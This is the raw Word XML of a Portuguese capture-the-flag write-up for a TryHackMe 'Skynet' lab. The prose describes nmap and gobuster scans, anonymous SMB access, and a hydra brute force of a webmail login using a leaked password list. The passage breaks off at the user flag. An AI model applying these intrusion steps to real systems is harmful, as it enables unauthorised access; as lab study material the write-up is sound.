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B7FD2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74E59B" wp14:editId="05992981">
            <wp:extent cx="5400040" cy="2169795"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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7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3999F" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="418925AE" w14:textId="77777777" w:rsidR="00126C16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45775189" w14:textId="77777777" w:rsidR="00126C16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0D7FDFFF" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C1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Layout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4247"/>
        <w:gridCol w:w="4247"/>
      </w:tblGrid>
      <w:tr w:rsidR="00126C16" w14:paraId="6CEAE7FD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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1E4F5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DC0EA56" w14:textId="77777777" w:rsidR="00126C1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126C16" w14:paraId="4D66B77B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="417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2D3C4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2CD9C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CTF de estudo – Guilherme Thomasi Ronca</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126C16" w14:paraId="5D32B00E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="42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9D367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021EF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126C16" w14:paraId="55A868B4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8E7F1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7071C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06/10/2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126C16" w14:paraId="5DB1E959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5AFB0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1B4CD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https://tryhackme.com/room/skynet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D51E31C" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C1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Layout w:type="fixed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126C16" w14:paraId="19448641" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="358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2729B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35816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Guilherme Thomasi Ronca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070B2D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126C16" w14:paraId="7E2CCB5C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="420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F3B56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43646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2E1C9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126C16" w14:paraId="46182819" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="426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2857B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7794F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572F7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27C73408" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C1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Layout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="704"/>
        <w:gridCol w:w="2126"/>
        <w:gridCol w:w="5664"/>
      </w:tblGrid>
      <w:tr w:rsidR="00126C16" w14:paraId="18B31C4B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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3CE6E" w14:textId="77777777" w:rsidR="00126C1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126C16" w14:paraId="1D4C66AE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="416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123EB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BAA78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764A1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126C16" w14:paraId="7DD57832" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="40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BF429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27F4B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A3524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126C16" w14:paraId="008918FB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="42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1195E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6E0B8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7EE2E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126C16" w14:paraId="4F209535" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="406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0067D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5B0D1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D2B3D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3008E81F" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60BDCD3E" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C77B783" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16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Layout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4247"/>
        <w:gridCol w:w="4247"/>
      </w:tblGrid>
      <w:tr w:rsidR="00126C16" w14:paraId="5E4E1FCF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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1E4F5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47C7FD52" w14:textId="77777777" w:rsidR="00126C16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126C16" w14:paraId="689476BA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="417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72D0D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8384B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126C16" w14:paraId="3F668BB6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="42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BA37A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B33FF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Pago</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126C16" w:rsidRPr="004225B7" w14:paraId="45465126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0AA94C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9CD5" w14:textId="566FB31F" w:rsidR="00126C16" w:rsidRPr="004225B7" w:rsidRDefault="00000000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4225B7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Linux, Web, Privilege Escalation, Reverse Shell, Exploits</w:t>
            </w:r>
            <w:r w:rsidR="004225B7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225B7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Smb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126C16" w14:paraId="26931AE9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3FA5E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8C0A3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26C16" w14:paraId="571854C1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="412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C337C" w14:textId="77777777" w:rsidR="00126C16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009E4" w14:textId="77777777" w:rsidR="00126C1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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B7863A7" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/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493DAF4" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/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740475812"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="2743A1F4" w14:textId="77777777" w:rsidR="00126C16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rPr>
              <w:rStyle w:val="IndexLink"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-9" \t "heading 1,1,heading 2,2,heading 3,3" \h</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_heading=h.gjdgxs">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Contextualização</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68A8C2EA" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
          <w:pP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rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Subtítulo caso necessário</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D4A6A78" w14:textId="77777777" w:rsidR="00126C16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rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Desenvolvimento</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AE340CF" w14:textId="2AFEE2C4" w:rsidR="00126C16" w:rsidRDefault="00000000">
          <w:pP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4225B7">
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>What is Miles Password for his emails</w:t>
            </w:r>
            <w:r w:rsidR="004225B7">
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B39F60E" w14:textId="3B6DD630" w:rsidR="00126C16" w:rsidRDefault="00000000">
          <w:pP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4225B7">
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>What is the hidden directory</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19A13B0C" w14:textId="11F00A58" w:rsidR="00126C16" w:rsidRDefault="00000000">
          <w:pP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4225B7" w:rsidRPr="004225B7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>What is the vulnerability called when you can include a remote file for malicious purposes?</w:t>
            </w:r>
            <w:r w:rsidRPr="004225B7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59630B88" w14:textId="4704FE83" w:rsidR="00126C16" w:rsidRPr="004225B7" w:rsidRDefault="004225B7">
          <w:pP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4225B7">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>What is the user flag?</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:br/>
            <w:t>What is the root flag?</w:t>
          </w:r>
          <w:hyperlink w:anchor="_heading=h.3dy6vkm">
            <w:r w:rsidR="00000000" w:rsidRPr="004225B7">
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47BE47E2" w14:textId="77777777" w:rsidR="00126C16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rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Conclusão</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69D87D05" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
          <w:pP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rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Referências</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="31411371" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16"/>
    <w:p w14:paraId="28939BBC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41CA524A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09C3B64E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34358483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04295595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40C4ED40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5DCE8BF6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57DC42CB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37FB4B33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3E80BB1E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6B9754B3" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="279938F6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/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3C2AF86E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57895D3D" w14:textId="3910992F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CTF pago da plataforma TryHackMe. O sistema é baseado no mundo de Terminator, e utiliza um servidor da Skynet que sera o alvo principal do desafio. Para completar o CTF, é necess</w:t>
      </w:r>
      <w:r w:rsidR="008405CE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rio conhecimento de Smbd, Reverse Shell e Privilege Escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCADFBA" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F5B1FF" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="004225B7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/>
      <w:bookmarkEnd w:id="1"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004225B7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2CBA4BCB" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="004225B7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4225B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Miles password for his e-mails?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FA8184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Primeiramente, fiz um nmap para encontrar portas abertas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02476578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0" distR="0" simplePos="0" relativeHeight="32" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="5FD9E432" wp14:editId="4514440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5400" cy="243840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0C6F23" w14:textId="1BDFD071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http est</w:t>
      </w:r>
      <w:r w:rsidR="008405CE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 xml:space="preserve"> aberto, coloquei o IP da maquina na web: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60104137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anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="33" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="3583AA86" wp14:editId="17319D9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40" cy="269684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A2B356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EC6E87E" w14:textId="262C375F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não encontrei nada de </w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ú</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>til no site principal, rodei um gobuster para encontrar diret</w:t>
      </w:r>
      <w:r w:rsidR="008405C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rios adicionais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD22C73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35" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="657670B5" wp14:editId="0BCEAFF7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400040" cy="318643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00093A" w14:textId="05ED6373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Apos visitar alguns diret</w:t>
      </w:r>
      <w:r w:rsidR="008405C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rios, o único com informa</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o era o /squirrelmail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756EBA8D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anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="36" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="134152E7" wp14:editId="4C1615EC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5400040" cy="307911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F7B42D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0C7ED0D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37" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="0653ECCF" wp14:editId="5CB06E28">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2565400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="243586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DDE93C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Acessei o Metasploit para tentar encontrar vulnerabilidades do sistema. Rodei um nmap e salvei no arquivo scan.xml, com isso importei o documento para o database do Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4970A5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8735F94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anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="39" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="777ECDC5" wp14:editId="56A8E5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9953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6917F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BA8A216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0" distR="0" simplePos="0" relativeHeight="38" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="286E697D" wp14:editId="2ED1B9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03780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5EDD83" w14:textId="75232A0B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Desses servi</w:t>
      </w:r>
      <w:r w:rsidR="008405CE"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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>os rodando no servidor, sei que a ferramenta smbmap consegue fazer uma enumera</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o do servico smdb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7564DB47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93D3A30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CEE25F7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anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="40" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="3EC91C16" wp14:editId="4447501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86915"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="9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336F76" w14:textId="6483323F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 smbmap, descubro que é possível fazer login utilizando anonymous. Tamb</w:t>
      </w:r>
      <w:r w:rsidR="008405CE"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m descubro o usu</w:t>
      </w:r>
      <w:r w:rsidR="008405CE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rio milesdyson.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B47F016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41" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="7ED90D06" wp14:editId="67D58AA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789940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="10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D25D40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42" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="06340840" wp14:editId="152D36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41880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="11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503166" w14:textId="57FE6029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smbclient, consigo fazer login na m</w:t>
      </w:r>
      <w:r w:rsidR="008405CE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quina, onde encontro 3 arquivos de interesse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2583E508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43" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="029DF422" wp14:editId="00AB72E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54355"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="12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4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F6289D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180FE88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CB165AC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C964F26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anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="44" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="4C63C463" wp14:editId="2A71EAD8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-71755</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-63500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2495550" cy="4191000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="13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19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675293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D7AF49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06C7436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BB31CA7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15EEEC3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1FA7C3D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17D225A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89BA9A5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6C7D556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B503F7F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0A0E3B3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74C078B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ACA3E34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BC14CF9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1B2BE82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14330BB" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49B155EB" w14:textId="491CE449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Log1.txt aparenta ser um arquivo de senhas, volto no squirrelmail e rodo um bruteforce com hydra utilizando o usu</w:t>
      </w:r>
      <w:r w:rsidR="008405CE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rio milesdyson e log1.txt como possíveis senhas, encontrando a primeira como sucesso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3339FD00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45" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="6F4B21E1" wp14:editId="305FA4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4030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="14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D836F3" w14:textId="77777777" w:rsidR="008405CE" w:rsidRDefault="008405CE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52ABC0AA" w14:textId="746E91B1" w:rsidR="00126C16" w:rsidRPr="004225B7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4225B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lastRenderedPageBreak/>
        <w:t>What is the hidden directory?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220B2788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Dentro do e-mail, descubro a seguinte senha:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F843DB" w14:textId="57E9DD2A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46" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="6037CF8B" wp14:editId="5821F50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87550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="15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EEA9DB" w14:textId="5AE5BFC5" w:rsidR="008405CE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47" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="29C26FE7" wp14:editId="234BC0A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3395"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="16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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Voltando ao smbclient, em vez de anonymous tento dar login com milesdyson </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4FEBEB" w14:textId="47053C7F" w:rsidR="00126C16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a senha descoberta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343DAE09" w14:textId="77777777" w:rsidR="008405CE" w:rsidRDefault="008405CE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81A7B86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48" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="2C2A379C" wp14:editId="6AA421F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5425" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="17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01A5E9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946BA80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0" distR="0" simplePos="0" relativeHeight="49" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="35B77604" wp14:editId="5A3752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638935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="18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6DBF0D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50" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="175BDA3D" wp14:editId="39D020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90850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="19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474DE8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51" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="00757CB5" wp14:editId="363DC9B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1200150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="20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84A49B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FABBAA7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A248B89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709CBB4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DD8966E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90FABDD" w14:textId="6895A107" w:rsidR="00126C16" w:rsidRPr="004225B7" w:rsidRDefault="00000000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4225B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Encontrei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004225B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004225B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>diret</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r w:rsidRPr="004225B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004225B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4225B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>escondido</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004225B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79411612" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="004225B7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50F8BA1B" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="004225B7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1088A87" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="004225B7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6FB74C62" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="004225B7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65FA48CE" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="004225B7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4DC7F4C1" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="004225B7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0B057BDD" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="004225B7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4225B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lastRenderedPageBreak/>
        <w:t>What is the vulnerability called when you can include a remote file for malicious purposes?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6D8867" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="004225B7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4225B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R: Remote file inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4116BD52" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="004225B7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2069CDD4" w14:textId="77777777" w:rsidR="00126C16" w:rsidRPr="004225B7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4225B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user flag?  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160A0C18" w14:textId="30815895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diret</w:t>
      </w:r>
      <w:r w:rsidR="008405C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rio me deparo com a seguinte p</w:t>
      </w:r>
